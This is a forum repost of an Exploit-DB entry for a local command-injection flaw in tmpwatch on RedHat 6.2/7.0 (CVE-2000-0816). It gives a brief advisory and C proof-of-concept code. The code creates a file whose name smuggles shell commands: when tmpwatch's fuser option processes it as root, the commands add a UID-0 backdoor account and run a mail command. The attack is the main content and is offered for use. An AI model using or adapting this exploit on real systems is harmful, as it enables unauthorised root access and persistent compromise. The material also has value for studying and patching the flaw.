Exploit RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20285
Проверка EDB
  1. Пройдено
Автор
X-FORCE
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2000-0816
Дата публикации
2000-10-06
C:
// source: https://www.securityfocus.com/bid/1785/info

A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

#include <stdio.h>

int main()
{
   FILE *f;
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
[email protected]<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   close(f);
}
 
Источник
www.exploit-db.com

Похожие темы